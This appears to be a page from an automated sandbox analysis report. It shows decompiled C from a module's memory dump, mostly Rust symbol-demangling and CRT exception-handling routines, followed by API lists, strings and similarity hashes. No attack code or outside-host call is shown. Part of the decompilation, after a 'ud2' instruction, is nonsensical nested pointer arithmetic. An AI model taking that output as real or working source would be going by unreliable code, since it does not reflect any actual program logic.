				signed char _t251;
				signed int _t258;
				intOrPtr _t268;
				unsigned int _t273;
				void* _t281;
				char* _t282;
				signed short _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				char* _t295;
				signed int _t303;
				signed int _t307;
				void* _t308;
				void* _t311;
				void* _t312;
				signed int* _t313;
				void* _t316;

				_pop(_t127);
				if(__eflags != 0) {
					 *((intOrPtr*)(_t308 + 0x10)) = _t250;
					_t251 =  *(__ecx + 4);
					 *((intOrPtr*)(_t308 + 0x14)) = _t127;
					 *(_t308 + 4) = __ecx;
					__eflags = _t251;
					if(_t251 == 0) {
						L19:
						_t288 =  *(_t308 + 4);
						_t214 =  *(_t288 + 0x14);
						__eflags =  *(_t288 + 0x14);
						if( *(_t288 + 0x14) == 0) {
							L21:
							 *_t288 = 1;
							goto L22;
						} else {
							_push(0x10);
							_t129 = E6EA81C10(_t214,  &M6EACF395);
							_t215 = 1;
							__eflags = _t129;
							if(_t129 == 0) {
								goto L21;
							}
						}
						goto L23;
					} else {
						_t130 =  *(_t308 + 4);
						_t216 =  *(_t130 + 0xc);
						_t131 =  *(_t130 + 8);
						__eflags = _t216 - _t131;
						 *(_t308 + 0xc) = _t216;
						 *(_t308 + 8) = _t131;
						if(_t216 < _t131) {
							_t290 =  *(_t308 + 4);
							_t279 = 0xffffffff;
							_t133 =  *(_t308 + 0xc) + 1;
							__eflags = _t133;
							_t218 =  ~( *(_t308 + 8));
							while(1) {
								__eflags = _t218 + _t133 - 1;
								if(_t218 + _t133 == 1) {
									goto L19;
								}
								_t196 =  *(_t251 + _t133 - 1) & 0x000000ff;
								 *(_t290 + 0xc) = _t133;
								_t133 = _t133 + 1;
								_t279 = _t279 + 1;
								_t198 = _t196 + 0xd0;
								__eflags = _t198 - 0xa;
								if(_t198 < 0xa) {
									continue;
								} else {
									_t200 = _t198 + 0x9f;
									__eflags = _t200 - 6;
									if(_t200 < 6) {
										continue;
									} else {
										__eflags = _t200 - 0x5f;
										if(_t200 != 0x5f) {
											goto L19;
										} else {
											_t291 =  *(_t308 + 0xc);
											_t134 = _t133 + 0xfffffffe;
											_t201 = _t251;
											__eflags = _t134 - _t291;
											if(_t134 < _t291) {
												L38:
												E6EAA9620(_t201,  *(_t308 + 8), _t291, _t134, 0x6eacf33c);
												_t311 = _t308 + 0xc;
												asm("ud2");
												goto L39;
											} else {
												__eflags = _t291;
												if(_t291 == 0) {
													L13:
													_t209 = _t201 + _t291;
													_t268 = _t308 + 0x18;
													 *((intOrPtr*)(_t308 + 0x18)) = _t201 + _t291;
													 *(_t308 + 0x1c) = _t279;
													E6EA88560(_t308 + 0x20, _t268);
													__eflags =  *(_t308 + 0x20);
													if( *(_t308 + 0x20) == 0) {
														_t291 =  *( *(_t308 + 4) + 0x14);
														__eflags = _t291;
														if(_t291 == 0) {
															goto L22;
														} else {
															_push(2);
															_t180 = E6EA81C10(_t291, 0x6eacf427);
															_t316 = _t308 + 4;
															_t215 = 1;
															__eflags = _t180;
															if(_t180 != 0) {
																goto L23;
															} else {
																_push(_t279);
																_t181 = E6EA81C10(_t291, _t209);
																_t215 = 1;
																_t311 = _t316 + 4;
																goto L34;
															}
														}
													} else {
														_t183 =  *( *(_t308 + 4) + 0x14);
														__eflags = _t183;
														if(_t183 == 0) {
															goto L22;
														} else {
															 *(_t308 + 8) = _t183;
															_t212 =  *((intOrPtr*)(_t308 + 0x2c));
															_t184 =  *(_t308 + 0x28);
															__eflags = _t184 - 0x2710;
															asm("sbb ecx, 0x0");
															if(_t184 < 0x2710) {
																_t238 = 0x27;
															} else {
																_t241 = 0x27;
																asm("o16 nop [cs:eax+eax]");
																do {
																	 *(_t308 + 4) = _t241;
																	 *(_t308 + 0xc) = _t184;
																	_t286 = E6EA9C5D0(_t184, _t212, 0x2710, 0);
																	_t184 = E6EA9C650(_t184, _t212, 0x2710, 0);
																	_t245 = ((_t286 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
																	__eflags = 0x5f5e0ff -  *(_t308 + 0xc);
																	asm("sbb esi, ebx");
																	_t303 =  *(_t308 + 4);
																	_t212 = _t268;
																	 *((short*)(_t308 + _t303 + 0x31)) =  *(_t245 + _t245 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																	 *((short*)(_t308 + _t303 + 0x33)) =  *((_t286 - _t245 * 0x00000064 & 0x0000ffff) + (_t286 - _t245 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																	_t241 = _t303 - 4;
																} while (0x5f5e0ff <  *(_t308 + 0xc));
															}
															_t279 =  *(_t308 + 8);
															__eflags = _t184 - 0x63;
															if(_t184 > 0x63) {
																_t273 = _t184 & 0x0000ffff;
																_t184 = (_t273 >> 2) * 0x147b >> 0x11;
																 *((short*)(_t308 + _t238 + 0x33)) =  *((_t273 - _t184 * 0x00000064 & 0x0000ffff) + (_t273 - _t184 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																_t238 = _t238 + 0xfffffffe;
																__eflags = _t238;
															}
															__eflags = _t184 - 0xa;
															if(_t184 >= 0xa) {
																 *((short*)(_t308 + _t238 + 0x33)) =  *(_t184 + _t184 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
																_t239 = _t238 + 0xfffffffe;
																__eflags = _t239;
															} else {
																 *((char*)(_t308 + _t238 + 0x34)) = _t184 + 0x30;
																_t239 = _t238 - 1;
															}
															__eflags = 0x27;
															_push(0x27 - _t239);
															_t291 = _t279;
															_push(_t308 + _t239 + 0x35);
															_push(0);
															_t181 = E6EA818D0(_t279, 0x6eacf570);
															_t311 = _t308 + 0xc;
															_t215 = 1;
															L34:
															__eflags = _t181;
															if(_t181 != 0) {
																goto L23;
															} else {
																__eflags =  *_t291 & 0x00000004;
																if(( *_t291 & 0x00000004) != 0) {
																	goto L22;
																} else {
																	_t201 =  *((intOrPtr*)(_t311 + 0x10)) + 0x9f;
																	__eflags = _t201 - 0x19;
																	if(__eflags <= 0) {
																		_t279 = _t201 & 0x000000ff;
																		_t134 = 4;
																		_t201 =  *((intOrPtr*)(_t311 + 0x14)) +  *((intOrPtr*)(0x6ea879d8 + (_t201 & 0x000000ff) * 4));
																		goto __ebx;
																	}
																	L39:
																	_t220 = "called `Option::unwrap()` on a `None` value";
																	_t136 = E6EAA94E0(_t201, _t220, 0x2b, _t279, _t291, __eflags, 0x6eacf42c);
																	_t312 = _t311 + 4;
																	asm("ud2");
																	asm("stosb");
																	 *((intOrPtr*)(_t220 - 0x46fffffd)) =  *((intOrPtr*)(_t220 - 0x46fffffd)) + _t201;
																	_t138 = _t136 +  *_t136 +  *((intOrPtr*)(_t136 +  *_t136));
																	_t140 = _t138 +  *_t138 +  *((intOrPtr*)(_t138 +  *_t138));
																	_t221 =  &(_t220[_t140]);
																	_t203 = _t201 + _t138 + _t201 + _t138;
																	 *_t291 =  *_t291 + _t221;
																	 *0x2b =  *0x2b + _t203;
																	_t150 = _t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)) +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56 +  *((intOrPtr*)(_t140 +  *_t140 + _t221 +  *((intOrPtr*)(_t140 +  *_t140 + _t221)) + 0x56)))))) + _t221))));
																	 *_t291 =  *_t291 + _t150;
																	 *0x2b =  *0x2b + 0x56;
																	 *_t221 =  *_t221 + _t203;
																	_t153 = _t150 +  *_t150 +  *((intOrPtr*)(_t150 +  *_t150)) +  *((intOrPtr*)(_t150 +  *_t150 +  *((intOrPtr*)(_t150 +  *_t150))));
																	 *((intOrPtr*)(_t153 + 3)) =  *((intOrPtr*)(_t153 + 3)) + _t153;
																	 *_t153 =  *_t153 + _t153;
																	asm("enter 0x3, 0x0");
																	asm("enter 0x3, 0x0");
																	_t154 = _t153 +  *_t153;
																	_t203[0] = _t203[0] + 0x56;
																	 *_t154 =  *_t154 + _t154;
																	_pop(_t281);
																	_t155 = _t154 +  *_t154;
																	_t203[0] = _t203[0] + _t221;
																	 *_t155 = _t155 +  *_t155;
																	__eflags =  *_t155;
																	asm("enter 0x3, 0x0");
																	if( *_t155 <= 0) {
																		 *_t155 = _t155 +  *_t155;
																		 *_t203 =  *_t203;
																		__eflags =  *_t203;
																	}
																	_t76 = _t281 + 0x55000003;
																	 *_t76 =  *(_t281 + 0x55000003) + _t221;
																	__eflags =  *_t76;
																	_push(_t203);
																	_push(_t281);
																	_push(_t291);
																	_t313 = _t312 - 0x24;
																	__eflags =  *_t221 - 1;
																	_t282 = _t221;
																	if( *_t221 != 1) {
																		_t222 =  *(_t282 + 8);
																		_t292 =  *(_t282 + 0xc);
																		_t157 =  *(_t282 + 4);
																		__eflags = _t292 - _t222;
																		_t313[3] = _t222;
																		if(_t292 >= _t222) {
																			L53:
																			__eflags = _t157;
																			if(_t157 == 0) {
																				L67:
																				_t204 = 0;
																				goto L72;
																			} else {
																				_t313[1] = 0x56;
																				_t258 = 0;
																				__eflags = _t292 - _t313[3];
																				_t204 = 0;
																				 *_t313 = _t292;
																				if(_t292 >= _t313[3]) {
																					goto L72;
																				} else {
																					_t313[2] = _t157;
																					_t225 = 0;
																					__eflags = 0;
																					_t307 =  *_t313 + 1;
																					_t164 = _t313[2];
																					asm("o16 nop [cs:eax+eax]");
																					while(1) {
																						_t165 =  *(_t164 + _t307 - 1) & 0x000000ff;
																						__eflags = _t165 - 0x5f;
																						if(_t165 == 0x5f) {
																							break;
																						}
																						_t207 = _t165 + 0xd0;
																						__eflags = _t207 - 0xa;
																						if(__eflags < 0) {
																							L63:
																							_t295 = _t282;
																							 *(_t282 + 0xc) = _t307;
																							_t170 = _t225;
																							_t208 = _t207 & 0xffffff00 | __eflags > 0x00000000;
																							_t171 = _t170 * 0x3e;
																							_t258 = (_t170 * 0x3e >> 0x20) + _t258 * 0x3e;
																							if(__eflags != 0) {
																								_t204 = 0;
																								__eflags = 0;
																								goto L71;
																							} else {
																								_t204 = 0;
																								_t225 = _t171 + (_t208 & 0x000000ff);
																								__eflags = _t225;
																								asm("adc edx, 0x0");
																								if(_t225 < 0) {
																									L71:
																									_t282 = _t295;
																									goto L72;
																								} else {
																									__eflags = _t313[3] - _t307;
																									_t164 = _t313[2];
																									_t307 = _t307 + 1;
																									_t282 = _t295;
																									if(__eflags != 0) {
																										continue;
																									} else {
																										goto L72;
																									}
																								}
																							}
																						} else {
																							_t173 = _t165 + 0x9f;
																							__eflags = _t173 - 0x1a;
																							if(__eflags >= 0) {
																								_t175 = _t173 + 0xbf;
																								__eflags = _t175 - 0x1a;
																								if(_t175 >= 0x1a) {
																									goto L67;
																								} else {
																									_t176 = _t175 + 0xe3;
																									__eflags = _t176;
																									goto L62;
																								}
																							} else {
																								_t176 = _t173 + 0xa9;
																								L62:
																								_t207 = _t176;
																								goto L63;
																							}
																						}
																						goto L76;
																					}
																					_t204 = 0;
																					_t226 = _t225 + 1;
																					__eflags = _t226;
																					 *(_t282 + 0xc) = _t307;
																					asm("adc edx, 0x0");
																					if(_t226 < 0) {
																						goto L72;
																					} else {
																						_t292 =  *_t313;
																						goto L49;
																					}
																				}
																			}
																		} else {
																			__eflags = _t157;
																			if(_t157 == 0) {
																				goto L53;
																			} else {
																				__eflags =  *((char*)(_t157 + _t292)) - 0x5f;
																				if( *((char*)(_t157 + _t292)) != 0x5f) {
																					goto L53;
																				} else {
																					_t313[1] = 0x56;
																					_t226 = 0;
																					__eflags = 0;
																					 *(_t282 + 0xc) = _t292 + 1;
																					L49:
																					_t204 = 0;
																					__eflags = _t226 - _t292 - 1;
																					asm("sbb edx, 0x0");
																					if(_t226 >= _t292 - 1) {
																						L72:
																						_t223 =  *(_t282 + 0x14);
																						__eflags =  *(_t282 + 0x14);
																						if( *(_t282 + 0x14) == 0) {
																							L74:
																							 *_t282 = 1;
																							 *(_t282 + 1) = _t204;
																							goto L75;
																						} else {
																							__eflags = _t204;
																							_t257 =  !=  ? "{recursion limit reached}{invalid syntax}" :  &M6EACF395;
																							_push((_t204 & 0x000000ff) + 0x10 + (_t204 & 0x000000ff) * 8);
																							_t162 = E6EA81C10(_t223,  !=  ? "{recursion limit reached}{invalid syntax}" :  &M6EACF395);
																							_t313 =  &(_t313[1]);
																							_t158 = 1;
																							__eflags = _t162;
																							if(_t162 == 0) {
																								goto L74;
																							}
																						}
																					} else {
																						_t204 = 1;
																						_t167 =  *(_t282 + 0x10) + 1;
																						__eflags = _t167 - 0x1f4;
																						if(_t167 > 0x1f4) {
																							goto L72;
																						} else {
																							__eflags =  *(_t282 + 0x14);
																							if( *(_t282 + 0x14) == 0) {
																								goto L75;
																							} else {
																								asm("movsd xmm0, [edi]");
																								asm("movsd xmm1, [edi+0x8]");
																								 *_t282 = 0;
																								 *(_t282 + 0xc) = _t226;
																								 *(_t282 + 0x10) = _t167;
																								_t313[8] =  *(_t282 + 0x10);
																								__eflags = _t313[1];
																								asm("movsd [esp+0x18], xmm1");
																								asm("movsd [esp+0x10], xmm0");
																								_t158 = E6EA86D90(_t282);
																								asm("movsd xmm0, [esp+0x10]");
																								asm("movsd xmm1, [esp+0x18]");
																								asm("movsd [edi], xmm0");
																								asm("movsd [edi+0x8], xmm1");
																								 *(_t282 + 0x10) = _t313[8];
																							}
																						}
																					}
																				}
																			}
																		}
																		goto L76;
																	} else {
																		_t232 =  *(_t282 + 0x14);
																		__eflags =  *(_t282 + 0x14);
																		if( *(_t282 + 0x14) == 0) {
																			L75:
																			_t158 = 0;
																			__eflags = 0;
																			L76:
																		} else {
																			_push(1);
																			_t158 = E6EA81C10(_t232, "?\'for<, >  as ::{shimclosure#[]dyn  + ; mut const  unsafe extern \"");
																		}
																	}
																	return _t158;
																}
															}
														}
													}
												} else {
													__eflags =  *((char*)(_t201 + _t291)) - 0xbf;
													if( *((char*)(_t201 + _t291)) <= 0xbf) {
														goto L38;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								}
								goto L78;
							}
						}
						goto L19;
					}
				} else {
					_t249 =  *((intOrPtr*)(__ecx + 0x14));
					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
						L22:
						_t215 = 0;
						__eflags = 0;
					} else {
						_push(1);
						_t215 = E6EA81C10(_t249, "?\'for<, >  as ::{shimclosure#[]dyn  + ; mut const  unsafe extern \"");
					}
					L23:
					return _t215;
				}
				L78:
			}

0x6ea875f4
0x6ea875f5
0x6ea87618
0x6ea8761c
0x6ea8761f
0x6ea87623
0x6ea87627
0x6ea87629
0x6ea87786
0x6ea87786
0x6ea8778a
0x6ea8778d
0x6ea8778f
0x6ea877a6
0x6ea877a6
0x00000000
0x6ea87791
0x6ea87796
0x6ea87798
0x6ea877a0
0x6ea877a2
0x6ea877a4
0x00000000
0x00000000
0x6ea877a4
0x00000000
0x6ea8762f
0x6ea8762f
0x6ea87633
0x6ea87636
0x6ea87639
0x6ea8763b
0x6ea8763f
0x6ea87643
0x6ea87651
0x6ea87655
0x6ea8765a
0x6ea8765a
0x6ea8765b
0x6ea87660
0x6ea87663
0x6ea87666
0x00000000
0x00000000
0x6ea8766e
0x6ea87673
0x6ea87676
0x6ea87677
0x6ea8767a
0x6ea8767d
0x6ea87680
0x00000000
0x6ea87682
0x6ea87684
0x6ea87687
0x6ea8768a
0x00000000
0x6ea8768c
0x6ea8768c
0x6ea8768f
0x00000000
0x6ea87695
0x6ea87695
0x6ea87699
0x6ea8769c
0x6ea8769e
0x6ea876a0
0x6ea879a5
0x6ea879b2
0x6ea879b7
0x6ea879ba
0x00000000
0x6ea876a6
0x6ea876a6
0x6ea876a8
0x6ea876b4
0x6ea876b4
0x6ea876ba
0x6ea876be
0x6ea876c2
0x6ea876c6
0x6ea876cb
0x6ea876d0
0x6ea877bb
0x6ea877be
0x6ea877c0
0x00000000
0x6ea877c2
0x6ea877c9
0x6ea877cb
0x6ea877d0
0x6ea877d3
0x6ea877d5
0x6ea877d7
0x00000000
0x6ea877d9
0x6ea877dd
0x6ea877de
0x6ea877e3
0x6ea877e5
0x00000000
0x6ea877e5
0x6ea877d7
0x6ea876d6
0x6ea876da
0x6ea876dd
0x6ea876df
0x00000000
0x6ea876e5
0x6ea876e5
0x6ea876e9
0x6ea876ed
0x6ea876f1
0x6ea876f8
0x6ea876fb
0x6ea877ea
0x6ea87701
0x6ea87701
0x6ea87706
0x6ea87710
0x6ea87710
0x6ea87716
0x6ea87728
0x6ea87733
0x6ea87744
0x6ea87759
0x6ea87762
0x6ea87764
0x6ea87768
0x6ea8776a
0x6ea8777a
0x6ea8777f
0x6ea8777f
0x6ea87784
0x6ea877ef
0x6ea877f3
0x6ea877f6
0x6ea877f8
0x6ea87806
0x6ea87819
0x6ea8781e
0x6ea8781e
0x6ea8781e
0x6ea87821
0x6ea87824
0x6ea87837
0x6ea8783c
0x6ea8783c
0x6ea87826
0x6ea87828
0x6ea8782c
0x6ea8782c
0x6ea8784d
0x6ea87851
0x6ea87852
0x6ea87854
0x6ea87855
0x6ea87857
0x6ea8785c
0x6ea8785f
0x6ea87861
0x6ea87861
0x6ea87863
0x00000000
0x6ea87869
0x6ea87869
0x6ea8786c
0x00000000
0x6ea87872
0x6ea87876
0x6ea87879
0x6ea8787c
0x6ea87882
0x6ea87890
0x6ea87895
0x6ea8789c
0x6ea8789c
0x6ea879bc
0x6ea879bc
0x6ea879cb
0x6ea879d0
0x6ea879d3
0x6ea879d8
0x6ea879db
0x6ea879e1
0x6ea879e9
0x6ea879eb
0x6ea879f7
0x6ea879fb
0x6ea87a03
0x6ea87a05
0x6ea87a07
0x6ea87a0b
0x6ea87a0f
0x6ea87a11
0x6ea87a13
0x6ea87a16
0x6ea87a18
0x6ea87a1c
0x6ea87a21
0x6ea87a23
0x6ea87a26
0x6ea87a28
0x6ea87a29
0x6ea87a2b
0x6ea87a2e
0x6ea87a2e
0x6ea87a30
0x6ea87a34
0x6ea87a36
0x6ea87a38
0x6ea87a38
0x6ea87a38
0x6ea87a3b
0x6ea87a3b
0x6ea87a3b
0x6ea87a41
0x6ea87a42
0x6ea87a43
0x6ea87a44
0x6ea87a47
0x6ea87a4a
0x6ea87a4c
0x6ea87a6d
0x6ea87a70
0x6ea87a73
0x6ea87a76
0x6ea87a78
0x6ea87a7c
0x6ea87b22
0x6ea87b22
0x6ea87b24
0x6ea87be2
0x6ea87be2
0x00000000
0x6ea87b2a
0x6ea87b2a
0x6ea87b2e
0x6ea87b30
0x6ea87b34
0x6ea87b39
0x6ea87b3c
0x00000000
0x6ea87b42
0x6ea87b42
0x6ea87b49
0x6ea87b49
0x6ea87b4b
0x6ea87b4e
0x6ea87b52
0x6ea87b60
0x6ea87b60
0x6ea87b65
0x6ea87b67
0x00000000
0x00000000
0x6ea87b6b
0x6ea87b6e
0x6ea87b71
0x6ea87b9e
0x6ea87ba5
0x6ea87ba7
0x6ea87bb3
0x6ea87bb5
0x6ea87bb8
0x6ea87bba
0x6ea87bc1
0x6ea87bfb
0x6ea87bfb
0x00000000
0x6ea87bc3
0x6ea87bc8
0x6ea87bca
0x6ea87bca
0x6ea87bcc
0x6ea87bcf
0x6ea87bfd
0x6ea87bfd
0x00000000
0x6ea87bd1
0x6ea87bd1
0x6ea87bd5
0x6ea87bd9
0x6ea87bdc
0x6ea87bde
0x00000000
0x6ea87be0
0x00000000
0x6ea87be0
0x6ea87bde
0x6ea87bcf
0x6ea87b73
0x6ea87b75
0x6ea87b78
0x6ea87b7b
0x6ea87b92
0x6ea87b95
0x6ea87b98
0x00000000
0x6ea87b9a
0x6ea87b9a
0x6ea87b9a
0x00000000
0x6ea87b9a
0x6ea87b7d
0x6ea87b7d
0x6ea87b9c
0x6ea87b9c
0x00000000
0x6ea87b9c
0x6ea87b7b
0x00000000
0x6ea87b71
0x6ea87be6
0x6ea87be8
0x6ea87be8
0x6ea87beb
0x6ea87bee
0x6ea87bf1
0x00000000
0x6ea87bf3
0x6ea87bf3
0x00000000
0x6ea87bf3
0x6ea87bf1
0x6ea87b3c
0x6ea87a82
0x6ea87a82
0x6ea87a84
0x00000000
0x6ea87a8a
0x6ea87a8a
0x6ea87a8e
0x00000000
0x6ea87a94
0x6ea87a94
0x6ea87a9b
0x6ea87a9d
0x6ea87a9f
0x6ea87aa2
0x6ea87aa3
0x6ea87aa5
0x6ea87aa7
0x6ea87aaa
0x6ea87bff
0x6ea87bff
0x6ea87c02
0x6ea87c04
0x6ea87c2d
0x6ea87c2d
0x6ea87c30
0x00000000
0x6ea87c06
0x6ea87c10
0x6ea87c12
0x6ea87c1c
0x6ea87c1d
0x6ea87c22
0x6ea87c27
0x6ea87c29
0x6ea87c2b
0x00000000
0x00000000
0x6ea87c2b
0x6ea87ab0
0x6ea87ab3
0x6ea87ab5
0x6ea87ab6
0x6ea87abb
0x00000000
0x6ea87ac1
0x6ea87ac1
0x6ea87ac5
0x00000000
0x6ea87acb
0x6ea87ace
0x6ea87ad2
0x6ea87ad7
0x6ea87ada
0x6ea87adf
0x6ea87ae2
0x6ea87ae8
0x6ea87aed
0x6ea87af3
0x6ea87afc
0x6ea87b01
0x6ea87b07
0x6ea87b11
0x6ea87b15
0x6ea87b1a
0x6ea87b1a
0x6ea87ac5
0x6ea87abb
0x6ea87aaa
0x6ea87a8e
0x6ea87a84
0x00000000
0x6ea87a4e
0x6ea87a4e
0x6ea87a51
0x6ea87a53
0x6ea87c33
0x6ea87c33
0x6ea87c33
0x6ea87c35
0x6ea87a59
0x6ea87a5e
0x6ea87a60
0x6ea87a65
0x6ea87a53
0x6ea87c3c
0x6ea87c3c
0x6ea8786c
0x6ea87863
0x6ea876df
0x6ea876aa
0x6ea876aa
0x6ea876ae
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea876ae
0x6ea876a8
0x6ea876a0
0x6ea8768f
0x6ea8768a
0x00000000
0x6ea87680
0x6ea87660
0x00000000
0x6ea87643
0x6ea875f7
0x6ea875f7
0x6ea875fc
0x6ea877ab
0x6ea877ab
0x6ea877ab
0x6ea87602
0x6ea87607
0x6ea87611
0x6ea87611
0x6ea877ad
0x6ea877b6
0x6ea877b6
0x00000000

APIs

__aullrem.LIBCMT ref: 6EA87723
__aulldiv.LIBCMT ref: 6EA87733

Strings

{recursion limit reached}{invalid syntax}, xrefs: 6EA87C06
called `Option::unwrap()` on a `None` value, xrefs: 6EA879BC
bool, xrefs: 6EA8788B
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6EA87602, 6EA87A59

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
API String ID: 3839614884-433696047
Opcode ID: 6f1f186abb9339f2c65326fd51105be51a9b53556ef9b1e7166a1b789d8b5301
Instruction ID: 1c3922e5997f814267ff25a7feb7dec3fac9ac53cf311c8018afae3aa306a5d6
Opcode Fuzzy Hash: 6f1f186abb9339f2c65326fd51105be51a9b53556ef9b1e7166a1b789d8b5301
Instruction Fuzzy Hash: 01E1D2757087419FD304CFA8C49076BBBE1AF86314F18896EE895CB3D1D734A886CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9D1CC, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EA9D1D8
IsDebuggerPresent.KERNEL32 ref: 6EA9D2A4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EA9D2C4
UnhandledExceptionFilter.KERNEL32(?), ref: 6EA9D2CE

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 316ed41eb724a27abd2e4039a8fa45f8472c04a65a2764d8551d7466d33b747a
Instruction ID: 623c6cad2d6c4bf19cd9e1f1c53d013d4e38cfbdac3fb1489bc11f35418e43b2
Opcode Fuzzy Hash: 316ed41eb724a27abd2e4039a8fa45f8472c04a65a2764d8551d7466d33b747a
Instruction Fuzzy Hash: 143104759153199BDB11DFA4C989BCDBBF8AF08304F1080AAE40DAB240EB719AC5DF58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8DD30, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 74%

